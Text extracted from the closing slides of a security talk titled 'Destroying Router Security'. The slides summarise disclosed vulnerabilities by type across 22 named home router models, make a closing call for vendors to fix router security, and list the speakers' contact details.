  • 69. Results • More than 60 vulnerabilities have been discovered • 22 router models affected • 11 manufacturers affected Destroying Router Security · NNC5ed40
  • 70. Destroying Router Security · NNC5ed41 0 2 4 6 8 10 12 14 16 18 Disclosed vulnerabilities per manufacturer Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilitiesNumber of affected routers
  • 71. Destroying Router Security · NNC5ed42 21% 15% 20% 8% 2% 3% 2% 6% 23% XSS Unauthenticated XSS CSRF Denial of Service Privilege Escalation Information Disclosure Backdoor Bypass Authentication UPnP Vulnerabilities by types
  • 72. Destroying Router Security · NNC5ed43 Router XSS Unauth. XSS CSRF DoS Privilege Escalation Info. Disclosure Backdoor Bypass Auth. UPnP Observa Telecom AW4062 Vuln. - Vuln. Vuln. Vuln. - - - - Comtrend WAP-5813n Vuln. - Vuln. - - - - - Vuln. Comtrend CT-5365 Vuln. Vuln. Vuln. - - - - - Vuln. D-Link DSL2750B - - - - - Vuln. - - Vuln. Belkin F5D7632-4 - - Vuln. Vuln. - - - - Vuln. Sagem LiveBox Pro 2 SP Vuln. - - - - - - - Vuln. Amper Xavi 7968/+ - Vuln. - - - - - - Vuln. Sagem F@st 1201 - Vuln. - - - - - - - Linksys WRT54GL - Vuln. - - - - - - - Observa Telecom RTA01N Vuln. Vuln. Vuln. Vuln. - - Vuln. - Vuln. Observa Telecom BHS-RTA - - - - - Vuln. - - Vuln. Observa Telecom VH4032N Vuln. - Vuln. - - - - Vuln. Vuln. Huawei HG553 Vuln. - Vuln. Vuln. - - - Vuln. Vuln. Huawei HG556a Vuln. Vuln. Vuln. Vuln. - - - Vuln. Vuln. Astoria ARV7510 - - Vuln. - - - - Vuln. - Amper ASL-26555 Vuln. Vuln. Vuln. - - - - Vuln. Comtrend AR-5387un Vuln. Vuln. - - - - - - - Netgear CG3100D Vuln. - Vuln. - - - - - - Comtrend VG-8050 Vuln. Vuln. - - - - - - - Zyxel P 660HW-B1A Vuln. - Vuln. - - - - - - Comtrend 536+ - - - - - - - - Vuln. D-Link DIR-600 - - - - - - - - Vuln.
  • 79. Conclusion • Has SOHO router security improved? • Hell NO! • Serious security problems • Easy to exploit • With huge impact • Millions of users affected • PLEASE, START FIXING SOHO ROUTER SECURITY • NOW! Destroying Router Security · NNC5ed45
  • 82. Álvaro Folgado Rueda · alvfolrue@gmail.com José A. Rodríguez García · joseantorodriguezg@gmail.com Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com Destroying Router Security · NNC5ed47 Thank you! Q&A Time